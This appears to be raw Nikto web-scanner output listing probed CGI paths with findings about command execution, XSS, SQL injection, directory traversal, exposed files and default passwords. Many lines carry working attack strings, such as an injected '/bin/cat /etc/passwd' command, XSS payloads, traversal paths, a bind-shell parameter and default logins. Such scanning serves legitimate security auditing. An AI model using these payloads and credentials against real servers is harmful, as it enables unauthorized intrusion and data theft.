+ /cgi-bin-sdb/cgitest.exe: This CGI allows remote users to download other CGI source code. May have a buffer overflow in the User-Agent header.
+ OSVDB-6666: /webcgi/hpnst.exe?c=p+i=SrvSystemInfo.html: HP Instant TopTools may be vulnerable to a DoS by requesting hpnst.exe?c=p+i=hpnst.exe multiple times.
+ OSVDB-6666: /cgi/hpnst.exe?c=p+i=SrvSystemInfo.html: HP Instant TopTools may be vulnerable to a DoS by requesting hpnst.exe?c=p+i=hpnst.exe multiple times.
+ OSVDB-6666: /htbin/hpnst.exe?c=p+i=SrvSystemInfo.html: HP Instant TopTools may be vulnerable to a DoS by requesting hpnst.exe?c=p+i=hpnst.exe multiple times.
+ OSVDB-6666: /scripts/hpnst.exe?c=p+i=SrvSystemInfo.html: HP Instant TopTools may be vulnerable to a DoS by requesting hpnst.exe?c=p+i=hpnst.exe multiple times.
+ /contents/extensions/asp/1: The IIS system may be vulnerable to a DOS, see http://www.microsoft.com/technet/security/bulletin/MS02-018.asp for details.
+ OSVDB-55370: /cgibin/Pbcgi.exe: Sambar may be vulnerable to a DOS when a long string is passed to Pbcgi.exe (not attempted). Default CGI should be removed from web servers.
+ OSVDB-55370: /scripts/Pbcgi.exe: Sambar may be vulnerable to a DOS when a long string is passed to Pbcgi.exe (not attempted). Default CGI should be removed from web servers.
+ OSVDB-55370: /fcgi-bin/Pbcgi.exe: Sambar may be vulnerable to a DOS when a long string is passed to Pbcgi.exe (not attempted). Default CGI should be removed from web servers.
+ OSVDB-55370: /cgi-perl/Pbcgi.exe: Sambar may be vulnerable to a DOS when a long string is passed to Pbcgi.exe (not attempted). Default CGI should be removed from web servers.
+ OSVDB-55369: /cgi-915/testcgi.exe: Sambar may be vulnerable to a DOS when a long string is passed to testcgi.exe (not attempted). Default CGI should be removed from web servers.
+ OSVDB-55369: /cgi-bin-sdb/testcgi.exe: Sambar may be vulnerable to a DOS when a long string is passed to testcgi.exe (not attempted). Default CGI should be removed from web servers.
+ /cgi-bin/snorkerz.cmd: Arguments passed to DOS CGI without checking
+ /htbin/snorkerz.cmd: Arguments passed to DOS CGI without checking
+ /fcgi-bin/snorkerz.cmd: Arguments passed to DOS CGI without checking
+ /cgi-exe/snorkerz.cmd: Arguments passed to DOS CGI without checking
+ /cgi-915/webfind.exe?keywords=01234567890123456789: May be vulnerable to a buffer overflow (request 2000 bytes of data). Upgrade to WebSitePro 2.5 or greater
+ /fcgi-bin/webfind.exe?keywords=01234567890123456789: May be vulnerable to a buffer overflow (request 2000 bytes of data). Upgrade to WebSitePro 2.5 or greater
+ /cgi-perl/webfind.exe?keywords=01234567890123456789: May be vulnerable to a buffer overflow (request 2000 bytes of data). Upgrade to WebSitePro 2.5 or greater
+ OSVDB-36894: /My_eGallery/public/displayCategory.php: My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection. displayCategory.php calls imageFunctions.php without checking URL/location arguments.
+ /cgi-915/classifieds/index.cgi: My Classifieds pre 2.12 is vulnerable to SQL injection attacks.
+ /cgi-bin/classifieds/index.cgi: My Classifieds pre 2.12 is vulnerable to SQL injection attacks.
+ /scripts/classifieds/index.cgi: My Classifieds pre 2.12 is vulnerable to SQL injection attacks.
+ OSVDB-10107: /author.asp: May be FactoSystem CMS, which could include SQL injection problems that could not be tested remotely.
+ /webcgi/myguestbook.cgi?action=view: myGuestBook 1.0 may be vulnerable to Cross Site Scripting (XSS) in posted contents. Upgrade to the latest version from http://www.levcgi.com/.  http://www.cert.org/advisories/CA-2000-02.html.
+ /cgi-915/myguestbook.cgi?action=view: myGuestBook 1.0 may be vulnerable to Cross Site Scripting (XSS) in posted contents. Upgrade to the latest version from http://www.levcgi.com/.  http://www.cert.org/advisories/CA-2000-02.html.
+ /cgi/myguestbook.cgi?action=view: myGuestBook 1.0 may be vulnerable to Cross Site Scripting (XSS) in posted contents. Upgrade to the latest version from http://www.levcgi.com/.  http://www.cert.org/advisories/CA-2000-02.html.
+ /cgis/myguestbook.cgi?action=view: myGuestBook 1.0 may be vulnerable to Cross Site Scripting (XSS) in posted contents. Upgrade to the latest version from http://www.levcgi.com/.  http://www.cert.org/advisories/CA-2000-02.html.
+ /scripts/myguestbook.cgi?action=view: myGuestBook 1.0 may be vulnerable to Cross Site Scripting (XSS) in posted contents. Upgrade to the latest version from http://www.levcgi.com/.  http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-21366: /cgi/diagnose.cgi: This COWS (CGI Online Worldweb Shopping) script may give system information to attackers, and may be vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-21366: /htbin/diagnose.cgi: This COWS (CGI Online Worldweb Shopping) script may give system information to attackers, and may be vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-21366: /cgi-bin-sdb/diagnose.cgi: This COWS (CGI Online Worldweb Shopping) script may give system information to attackers, and may be vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-4598: /members.asp?SF=%22;}alert(223344);function%20x(){v%20=%22: Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-2754: /guestbook/?number=5&lng=%3Cscript%3Ealert(document.domain);%3C/script%3E: MPM Guestbook 1.2 and previous are vulnreable to XSS attacks.
+ OSVDB-2946: /forum_members.asp?find=%22;}alert(9823);function%20x(){v%20=%22: Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-19772: /cgi-915/title.cgi: HNS's title.cgi is vulnerable to Cross Site Scripting (XSS http://www.cert.org/advisories/CA-2000-02.html) in version 2.00 and earlier, and Lite 0.8 and earlier.
+ OSVDB-19772: /cgi-win/title.cgi: HNS's title.cgi is vulnerable to Cross Site Scripting (XSS http://www.cert.org/advisories/CA-2000-02.html) in version 2.00 and earlier, and Lite 0.8 and earlier.
+ OSVDB-19772: /fcgi-bin/title.cgi: HNS's title.cgi is vulnerable to Cross Site Scripting (XSS http://www.cert.org/advisories/CA-2000-02.html) in version 2.00 and earlier, and Lite 0.8 and earlier.
+ OSVDB-19772: /cgi-exe/title.cgi: HNS's title.cgi is vulnerable to Cross Site Scripting (XSS http://www.cert.org/advisories/CA-2000-02.html) in version 2.00 and earlier, and Lite 0.8 and earlier.
+ OSVDB-19772: /cgi-perl/title.cgi: HNS's title.cgi is vulnerable to Cross Site Scripting (XSS http://www.cert.org/advisories/CA-2000-02.html) in version 2.00 and earlier, and Lite 0.8 and earlier.
+ OSVDB-21365: /cgi-915/compatible.cgi: This COWS (CGI Online Worldweb Shopping) script may give system information to attackers, and may be vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-21365: /htbin/compatible.cgi: This COWS (CGI Online Worldweb Shopping) script may give system information to attackers, and may be vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-21365: /scripts/compatible.cgi: This COWS (CGI Online Worldweb Shopping) script may give system information to attackers, and may be vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-21365: /cgi-exe/compatible.cgi: This COWS (CGI Online Worldweb Shopping) script may give system information to attackers, and may be vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /cgibin/probecontrol.cgi?command=enable&userNikto=cancer&password=killer: This might be interesting... has been seen in web logs from a scanner.
+ /cgi-exe/probecontrol.cgi?command=enable&userNikto=cancer&password=killer: This might be interesting... has been seen in web logs from a scanner.
+ /cgi-perl/probecontrol.cgi?command=enable&userNikto=cancer&password=killer: This might be interesting... has been seen in web logs from a scanner.
+ /cgi-bin-sdb/probecontrol.cgi?command=enable&userNikto=cancer&password=killer: This might be interesting... has been seen in web logs from a scanner.
+ /fcgi-bin/wwwadmin.pl: Administration CGI?
+ /cgi/webmap.cgi: nmap front end... could be fun
+ /cgi-bin/webmap.cgi: nmap front end... could be fun
+ /cgibin/webmap.cgi: nmap front end... could be fun
+ /cgis/webmap.cgi: nmap front end... could be fun
+ /fcgi-bin/webmap.cgi: nmap front end... could be fun
+ /cbms/changepass.php: CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/
+ /webcgi/admin/admin.cgi: May be ImageFolio Pro administration CGI. Default login is Admin/ImageFolio.
+ /cgi-915/admin/admin.cgi: May be ImageFolio Pro administration CGI. Default login is Admin/ImageFolio.
+ /fcgi-bin/admin/admin.cgi: May be ImageFolio Pro administration CGI. Default login is Admin/ImageFolio.
+ /cgi/admin/setup.cgi: May be ImageFolio Pro setup CGI. Default login is Admin/ImageFolio.
+ /cgibin/admin/setup.cgi: May be ImageFolio Pro setup CGI. Default login is Admin/ImageFolio.
+ /cgi-win/mt-static/mt-load.cgi: Movable Type weblog installation CGI found. May be able to reconfigure or reload.
+ /cgi-exe/mt/mt-load.cgi: Movable Type weblog installation CGI found. May be able to reconfigure or reload.
+ /cgi/dbman/db.cgi?db=no-db: This CGI allows remote attackers to view system information.
+ /htbin/dbman/db.cgi?db=no-db: This CGI allows remote attackers to view system information.
+ /cgi-perl/dbman/db.cgi?db=no-db: This CGI allows remote attackers to view system information.
+ OSVDB-17111: /cgi-exe/dcshop/auth_data/auth_user_file.txt: The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.
+ OSVDB-17111: /cgi-915/DCShop/auth_data/auth_user_file.txt: The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.
+ OSVDB-17111: /cgi-bin-sdb/DCShop/auth_data/auth_user_file.txt: The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.
+ OSVDB-596: /cgi-perl/dcshop/orders/orders.txt: The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.
+ /cgibin/dumpenv.pl: This CGI gives a lot of information to attackers.
+ /cgi-bin-sdb/dumpenv.pl: This CGI gives a lot of information to attackers.
+ /webcgi/mkilog.exe: This CGI can give an attacker a lot of information.
+ /cgi-bin/mkilog.exe: This CGI can give an attacker a lot of information.
+ /htbin/mkilog.exe: This CGI can give an attacker a lot of information.
+ /fcgi-bin/mkilog.exe: This CGI can give an attacker a lot of information.
+ /cgi-perl/mkilog.exe: This CGI can give an attacker a lot of information.
+ /webcgi/mkplog.exe: This CGI can give an attacker a lot of information.
+ /cgi/mkplog.exe: This CGI can give an attacker a lot of information.
+ /cgi-bin/mkplog.exe: This CGI can give an attacker a lot of information.
+ /htbin/mkplog.exe: This CGI can give an attacker a lot of information.
+ /cgibin/mkplog.exe: This CGI can give an attacker a lot of information.
+ /scripts/mkplog.exe: This CGI can give an attacker a lot of information.
+ /cgi-bin-sdb/mkplog.exe: This CGI can give an attacker a lot of information.
+ /htbin/processit.pl: This CGI returns environment variables, giving attackers valuable information.
+ /cgibin/processit.pl: This CGI returns environment variables, giving attackers valuable information.
+ /cgis/processit.pl: This CGI returns environment variables, giving attackers valuable information.
+ /cgi-exe/processit.pl: This CGI returns environment variables, giving attackers valuable information.
+ /webcgi/rpm_query: This CGI allows anyone to see the installed RPMs
+ /cgi-915/rpm_query: This CGI allows anyone to see the installed RPMs
+ /cgi/rpm_query: This CGI allows anyone to see the installed RPMs
+ /htbin/rpm_query: This CGI allows anyone to see the installed RPMs
+ /cgis/rpm_query: This CGI allows anyone to see the installed RPMs
+ /webcgi/ws_ftp.ini: Can contain saved passwords for ftp sites
+ /cgi/ws_ftp.ini: Can contain saved passwords for ftp sites
+ /cgi-bin-sdb/ws_ftp.ini: Can contain saved passwords for ftp sites
+ /scripts/WS_FTP.ini: Can contain saved passwords for ftp sites
+ /cgi-win/WS_FTP.ini: Can contain saved passwords for ftp sites
+ /fcgi-bin/WS_FTP.ini: Can contain saved passwords for ftp sites
+ /cgi-perl/WS_FTP.ini: Can contain saved passwords for ftp sites
+ /cgi-bin/MachineInfo: Gives out information on the machine (IRIX), including hostname
+ /cplogfile.log: XMB Magic Lantern forum 1.6b final (http://www.xmbforum.com) log file is readable remotely. Upgrade to the latest version.
+ /webcgi/view-source?view-source: This allows remote users to view source code.
+ /htbin/view-source?view-source: This allows remote users to view source code.
+ /scripts/view-source?view-source: This allows remote users to view source code.
+ /cgi-win/view-source?view-source: This allows remote users to view source code.
+ OSVDB-9332: /webcgi/scoadminreg.cgi: This script (part of UnixWare WebTop) may have a local root exploit. It is also an system admin script and should be protected via the web.
+ OSVDB-9332: /cgis/scoadminreg.cgi: This script (part of UnixWare WebTop) may have a local root exploit. It is also an system admin script and should be protected via the web.
+ OSVDB-9332: /cgi-perl/scoadminreg.cgi: This script (part of UnixWare WebTop) may have a local root exploit. It is also an system admin script and should be protected via the web.
+ OSVDB-9332: /cgi-bin-sdb/scoadminreg.cgi: This script (part of UnixWare WebTop) may have a local root exploit. It is also an system admin script and should be protected via the web.
+ OSVDB-4663: /cgi-bin/SGB_DIR/superguestconfig: Super GuestBook 1.0 from lasource.r2.ru stores the admin password in a plain text file.
+ /cgi-exe/icat: Multiple versions of icat allow attackers to read arbitrary files. Make sure the latest version is running.
+ /cgi-bin-sdb/icat: Multiple versions of icat allow attackers to read arbitrary files. Make sure the latest version is running.
+ /cgi-bin/nph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&refresh=0: nCUBE Server Manager 1.0 nph-showlogs.pl directory traversal bug
+ /scripts/nph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&refresh=0: nCUBE Server Manager 1.0 nph-showlogs.pl directory traversal bug
+ /fcgi-bin/nph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&refresh=0: nCUBE Server Manager 1.0 nph-showlogs.pl directory traversal bug
+ /cgibin/view-source: This may allow remote arbitrary file retrieval.
+ /cgis/view-source: This may allow remote arbitrary file retrieval.
+ /cgi-win/view-source: This may allow remote arbitrary file retrieval.
+ /cgi-exe/view-source: This may allow remote arbitrary file retrieval.
+ /cgi-bin-sdb/view-source: This may allow remote arbitrary file retrieval.
+ /cgi-915/wrap: This CGI lets users read any file with 755 perms. It should not be in the CGI directory.
+ /cgibin/wrap: This CGI lets users read any file with 755 perms. It should not be in the CGI directory.
+ /cgis/wrap: This CGI lets users read any file with 755 perms. It should not be in the CGI directory.
+ /fcgi-bin/wrap: This CGI lets users read any file with 755 perms. It should not be in the CGI directory.
+ /webcgi/cgiwrap: Some versions of cgiwrap allow anyone to execute commands remotely.
+ /cgi-bin-sdb/cgiwrap: Some versions of cgiwrap allow anyone to execute commands remotely.
+ /cgi/Count.cgi: This may allow attackers to execute arbitrary commands on the server
+ /htbin/Count.cgi: This may allow attackers to execute arbitrary commands on the server
+ /fcgi-bin/Count.cgi: This may allow attackers to execute arbitrary commands on the server
+ /cgi-exe/Count.cgi: This may allow attackers to execute arbitrary commands on the server
+ OSVDB-4571: /cgi-win/ImageFolio/admin/admin.cgi: ImageFolio (default accout Admin/ImageFolio) may allow files to be deleted via URLs like: ?cgi=remove.pl&uid=111.111.111.111&rmstep=2&category=../../../../../../../../../../../etc/
+ /webcgi/info2www: This CGI allows attackers to execute commands.
+ /htbin/info2www: This CGI allows attackers to execute commands.
+ /cgi-exe/info2www: This CGI allows attackers to execute commands.
+ /cgi-perl/info2www: This CGI allows attackers to execute commands.
+ /cgi-bin-sdb/info2www: This CGI allows attackers to execute commands.
+ /cgi-bin/infosrch.cgi: This CGI allows attackers to execute commands.
+ /cgis/infosrch.cgi: This CGI allows attackers to execute commands.
+ /cgi-win/infosrch.cgi: This CGI allows attackers to execute commands.
+ /cgi-bin/listrec.pl: This CGI allows attackers to execute commands on the host.
+ /htbin/listrec.pl: This CGI allows attackers to execute commands on the host.
+ /fcgi-bin/listrec.pl: This CGI allows attackers to execute commands on the host.
+ /cgi-exe/listrec.pl: This CGI allows attackers to execute commands on the host.
+ /htbin/mailnews.cgi: Some versions allow attacker to execute commands as http daemon. Upgrade or remove.
+ /cgi-exe/mailnews.cgi: Some versions allow attacker to execute commands as http daemon. Upgrade or remove.
+ /cgi-bin-sdb/mailnews.cgi: Some versions allow attacker to execute commands as http daemon. Upgrade or remove.
+ /cgi/mmstdod.cgi: May allow attacker to execute remote commands. Upgrade to version 3.0.26 or higher.
+ /cgi-bin/mmstdod.cgi: May allow attacker to execute remote commands. Upgrade to version 3.0.26 or higher.
+ /scripts/mmstdod.cgi: May allow attacker to execute remote commands. Upgrade to version 3.0.26 or higher.
+ /fcgi-bin/mmstdod.cgi: May allow attacker to execute remote commands. Upgrade to version 3.0.26 or higher.
+ /cgi-915/pagelog.cgi: Some versions of this allow you to create system files. Request 'pagelog.cgi?name=../../../../.././tmp/filename' to try.
+ /cgibin/pagelog.cgi: Some versions of this allow you to create system files. Request 'pagelog.cgi?name=../../../../.././tmp/filename' to try.
+ /cgi-perl/pagelog.cgi: Some versions of this allow you to create system files. Request 'pagelog.cgi?name=../../../../.././tmp/filename' to try.
+ /cgi-bin-sdb/pagelog.cgi: Some versions of this allow you to create system files. Request 'pagelog.cgi?name=../../../../.././tmp/filename' to try.
+ /cgi/perl?-v: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.
+ /cgi-win/perl?-v: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.
+ /fcgi-bin/perl?-v: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.
+ /cgi-bin-sdb/perl?-v: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.
+ /cgi-915/perl.exe?-v: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove perl.exe from the CGI dir.
+ /htbin/perl.exe?-v: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove perl.exe from the CGI dir.
+ /cgi-win/perl.exe?-v: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove perl.exe from the CGI dir.
+ /fcgi-bin/perl.exe?-v: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove perl.exe from the CGI dir.
+ /cgi-bin-sdb/perl.exe?-v: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove perl.exe from the CGI dir.
+ /cgibin/perl.exe: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.
+ /scripts/perl.exe: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.
+ /cgi-bin-sdb/perl.exe: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.
+ /htbin/perl: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.
+ /cgibin/perl: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.
+ /cgis/perl: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.
+ /scripts/perl: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.
+ /cgi-bin-sdb/perl: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.
+ /cgi/plusmail: This CGI may allow attackers to execute commands remotely.
+ /cgibin/plusmail: This CGI may allow attackers to execute commands remotely.
+ /cgi-win/plusmail: This CGI may allow attackers to execute commands remotely.
+ /cgi-bin-sdb/plusmail: This CGI may allow attackers to execute commands remotely.
+ OSVDB-10944: /htbin/scripts/slxweb.dll/getfile?type=Library&file=[invalid fileNikto]: SalesLogix WebClient may allow attackers to execute arbitrary commands on the host.
+ OSVDB-10944: /cgi-win/scripts/slxweb.dll/getfile?type=Library&file=[invalid filename]: SalesLogix WebClient may allow attackers to execute arbitrary commands on the host.
+ /scripts/smartsearch/smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|: To check for remote execution vulnerability use ?keywords=|/bin/ls| or your favorite command
+ OSVDB-54034: /htbin/spin_client.cgi?aaaaaaaa: This CGI may be vulnerable to remote execution by sending 8000 x 'a' characters (check to see if you get a 500 error message)
+ OSVDB-54034: /fcgi-bin/spin_client.cgi?aaaaaaaa: This CGI may be vulnerable to remote execution by sending 8000 x 'a' characters (check to see if you get a 500 error message)
+ OSVDB-54034: /cgi-perl/spin_client.cgi?aaaaaaaa: This CGI may be vulnerable to remote execution by sending 8000 x 'a' characters (check to see if you get a 500 error message)
+ OSVDB-10598: /webcgi/sscd_suncourier.pl: Sunsolve CD script may allow users to execute arbitrary commands. The script was confirmed to exist, but the test was not done.
+ OSVDB-10598: /cgi-perl/sscd_suncourier.pl: Sunsolve CD script may allow users to execute arbitrary commands. The script was confirmed to exist, but the test was not done.
+ OSVDB-10598: /cgi-bin-sdb/sscd_suncourier.pl: Sunsolve CD script may allow users to execute arbitrary commands. The script was confirmed to exist, but the test was not done.
+ OSVDB-13981: /cgibin/viralator.cgi: May be vulnerable to command injection, upgrade to 0.9pre2 or newer. This flaw could not be confirmed.
+ OSVDB-13981: /cgis/viralator.cgi: May be vulnerable to command injection, upgrade to 0.9pre2 or newer. This flaw could not be confirmed.
+ OSVDB-13981: /cgi-perl/viralator.cgi: May be vulnerable to command injection, upgrade to 0.9pre2 or newer. This flaw could not be confirmed.
+ OSVDB-4854: /webcgi/virgil.cgi: The Virgil CGI Scanner 0.9 allows remote users to gain a system shell. This could not be confirmed (try syntax like virgil.cgi?tar=-lp&zielport=31337 to open a connection on port 31337.
+ OSVDB-4854: /cgi-bin/virgil.cgi: The Virgil CGI Scanner 0.9 allows remote users to gain a system shell. This could not be confirmed (try syntax like virgil.cgi?tar=-lp&zielport=31337 to open a connection on port 31337.
+ OSVDB-4854: /cgibin/virgil.cgi: The Virgil CGI Scanner 0.9 allows remote users to gain a system shell. This could not be confirmed (try syntax like virgil.cgi?tar=-lp&zielport=31337 to open a connection on port 31337.
+ OSVDB-4854: /scripts/virgil.cgi: The Virgil CGI Scanner 0.9 allows remote users to gain a system shell. This could not be confirmed (try syntax like virgil.cgi?tar=-lp&zielport=31337 to open a connection on port 31337.
+ OSVDB-4854: /fcgi-bin/virgil.cgi: The Virgil CGI Scanner 0.9 allows remote users to gain a system shell. This could not be confirmed (try syntax like virgil.cgi?tar=-lp&zielport=31337 to open a connection on port 31337.
+ OSVDB-2088: /cgi-915/vpasswd.cgi: Some versions of this CGI allow attackers to execute commands on your system. Verify this is the latest version available.
+ OSVDB-2088: /cgi-bin/vpasswd.cgi: Some versions of this CGI allow attackers to execute commands on your system. Verify this is the latest version available.
+ OSVDB-2088: /cgis/vpasswd.cgi: Some versions of this CGI allow attackers to execute commands on your system. Verify this is the latest version available.
+ OSVDB-2088: /scripts/vpasswd.cgi: Some versions of this CGI allow attackers to execute commands on your system. Verify this is the latest version available.
+ OSVDB-236: /cgi-915/webgais: The webgais allows attackers to execute commands.
+ OSVDB-236: /cgi/webgais: The webgais allows attackers to execute commands.
+ OSVDB-236: /htbin/webgais: The webgais allows attackers to execute commands.
+ OSVDB-236: /cgis/webgais: The webgais allows attackers to execute commands.
+ OSVDB-236: /cgi-win/webgais: The webgais allows attackers to execute commands.
+ OSVDB-237: /cgi/websendmail: This CGI may allow attackers to execute arbitrary commands remotely.
+ OSVDB-237: /htbin/websendmail: This CGI may allow attackers to execute arbitrary commands remotely.
+ OSVDB-237: /cgi-win/websendmail: This CGI may allow attackers to execute arbitrary commands remotely.
+ /webcgi/wwwwais: wwwais has a vulnerability that lets attackers run commands as http daemon owner. Request 'CGIDIR/wwwais?version=version=123&' and 4096 bytes of garbage.
+ /cgi/wwwwais: wwwais has a vulnerability that lets attackers run commands as http daemon owner. Request 'CGIDIR/wwwais?version=version=123&' and 4096 bytes of garbage.
+ /cgi-bin/wwwwais: wwwais has a vulnerability that lets attackers run commands as http daemon owner. Request 'CGIDIR/wwwais?version=version=123&' and 4096 bytes of garbage.
+ /cgi-win/wwwwais: wwwais has a vulnerability that lets attackers run commands as http daemon owner. Request 'CGIDIR/wwwais?version=version=123&' and 4096 bytes of garbage.
+ /fcgi-bin/wwwwais: wwwais has a vulnerability that lets attackers run commands as http daemon owner. Request 'CGIDIR/wwwais?version=version=123&' and 4096 bytes of garbage.
+ /cgi-perl/wwwwais: wwwais has a vulnerability that lets attackers run commands as http daemon owner. Request 'CGIDIR/wwwais?version=version=123&' and 4096 bytes of garbage.
+ /cgi/common/listrec.pl: This CGI allows attackers to execute commands on the host.
+ /cgi-win/common/listrec.pl: This CGI allows attackers to execute commands on the host.
+ OSVDB-59031: /webcgi/stat.pl: Uninets StatsPlus 1.25 from http://www.uninetsolutions.com/stats.html may be vulnerable to command/script injection by manipulating HTTP_USER_AGENT or HTTP_REFERER.
+ OSVDB-28: /cgi-915/cachemgr.cgi: Manager for squid proxy; problem with RedHat 6 making it public, can allow attacker to perform port scans.
+ OSVDB-28: /cgi-bin/cachemgr.cgi: Manager for squid proxy; problem with RedHat 6 making it public, can allow attacker to perform port scans.
+ OSVDB-28: /cgibin/cachemgr.cgi: Manager for squid proxy; problem with RedHat 6 making it public, can allow attacker to perform port scans.
+ OSVDB-28: /scripts/cachemgr.cgi: Manager for squid proxy; problem with RedHat 6 making it public, can allow attacker to perform port scans.
+ OSVDB-28: /fcgi-bin/cachemgr.cgi: Manager for squid proxy; problem with RedHat 6 making it public, can allow attacker to perform port scans.
+ OSVDB-28: /cgi-bin-sdb/cachemgr.cgi: Manager for squid proxy; problem with RedHat 6 making it public, can allow attacker to perform port scans.
+ OSVDB-142: /webcgi/ppdscgi.exe: PowerPlay Web Edition may allow unauthenticated users to view pages.
+ OSVDB-142: /htbin/ppdscgi.exe: PowerPlay Web Edition may allow unauthenticated users to view pages.
+ OSVDB-142: /cgis/ppdscgi.exe: PowerPlay Web Edition may allow unauthenticated users to view pages.
+ OSVDB-142: /scripts/ppdscgi.exe: PowerPlay Web Edition may allow unauthenticated users to view pages.
+ /cgi-bin/webif.cgi: HNS's webif.cgi is vulnerable to allow remote users to rewrite diary entries if 'direct mode' is enabled in version 2.00 and earlier, and Lite 0.8 and earlier.
+ /scripts/webif.cgi: HNS's webif.cgi is vulnerable to allow remote users to rewrite diary entries if 'direct mode' is enabled in version 2.00 and earlier, and Lite 0.8 and earlier.
+ /fcgi-bin/webif.cgi: HNS's webif.cgi is vulnerable to allow remote users to rewrite diary entries if 'direct mode' is enabled in version 2.00 and earlier, and Lite 0.8 and earlier.
+ OSVDB-29786: /admin.php?en_log_id=0&action=config: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
+ OSVDB-29786: /admin.php?en_log_id=0&action=users: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
+ /admin.php4?reg_login=1: Mon Album from http://www.3dsrc.com version 0.6.2d allows remote admin access. This should be protected.
+ /cgibin/webdriver: This CGI often allows anyone to access the Informix DB on the host.
+ /cgi-exe/webdriver: This CGI often allows anyone to access the Informix DB on the host.
+ /cgi-perl/webdriver: This CGI often allows anyone to access the Informix DB on the host.
+ /cgi-win/c32web.exe/ChangeAdminPassword: This CGI may contain a backdoor and may allow attackers to change the Cart32 admin password.
+ /cgi/cgi-lib.pl: CGI Library. If retrieved check to see if it is outdated, it may have vulns
+ /cgi-bin/cgi-lib.pl: CGI Library. If retrieved check to see if it is outdated, it may have vulns
+ /htbin/cgi-lib.pl: CGI Library. If retrieved check to see if it is outdated, it may have vulns
+ /cgis/cgi-lib.pl: CGI Library. If retrieved check to see if it is outdated, it may have vulns
+ /cgi-exe/cgi-lib.pl: CGI Library. If retrieved check to see if it is outdated, it may have vulns
+ /fcgi-bin/log/nether-log.pl?checkit: Default Pass: nethernet-rules
+ /webcgi/mini_logger.cgi: Default password: guest
+ /cgi-915/mini_logger.cgi: Default password: guest
+ /scripts/mini_logger.cgi: Default password: guest
+ /fcgi-bin/mini_logger.cgi: Default password: guest
+ /cgi-bin-sdb/mini_logger.cgi: Default password: guest
+ /cgi-bin/nimages.php: Alpha versions of the Nimages package vulnerable to non-specific 'major' security bugs.
+ /cgis/nimages.php: Alpha versions of the Nimages package vulnerable to non-specific 'major' security bugs.
+ /cgi-exe/nimages.php: Alpha versions of the Nimages package vulnerable to non-specific 'major' security bugs.
+ /scripts/robadmin.cgi: Default password: roblog
+ /cgi-exe/robadmin.cgi: Default password: roblog
+ /htbin/netpad.cgi: netpad.cgi may be an indication of a malicious user on the system, as it allows web access to the file system. It may also have remote vulnerabilities itself. This should be removed or protected.
+ /scripts/netpad.cgi: netpad.cgi may be an indication of a malicious user on the system, as it allows web access to the file system. It may also have remote vulnerabilities itself. This should be removed or protected.
+ /cgi-exe/netpad.cgi: netpad.cgi may be an indication of a malicious user on the system, as it allows web access to the file system. It may also have remote vulnerabilities itself. This should be removed or protected.
+ /cgi/troops.cgi: This CGI may be a leftover from a hacked site; may be used to attempt to hack other sites.  It should be investigated further.
+ /cgis/troops.cgi: This CGI may be a leftover from a hacked site; may be used to attempt to hack other sites.  It should be investigated further.
+ /cgi-bin-sdb/troops.cgi: This CGI may be a leftover from a hacked site; may be used to attempt to hack other sites.  It should be investigated further.
+ /cgi-bin/unlg1.1: web backdoor by ULG
+ /cgis/unlg1.1: web backdoor by ULG
+ /cgi-win/unlg1.1: web backdoor by ULG
+ /cgi-perl/unlg1.1: web backdoor by ULG
+ /webcgi/unlg1.2: web backdoor by ULG
+ /cgi-915/unlg1.2: web backdoor by ULG
+ /cgis/unlg1.2: web backdoor by ULG
+ /cgi-exe/unlg1.2: web backdoor by ULG
+ /cgi-bin-sdb/unlg1.2: web backdoor by ULG
+ /cgi/rwwwshell.pl: THC reverse www shell
+ /cgi-bin/rwwwshell.pl: THC reverse www shell
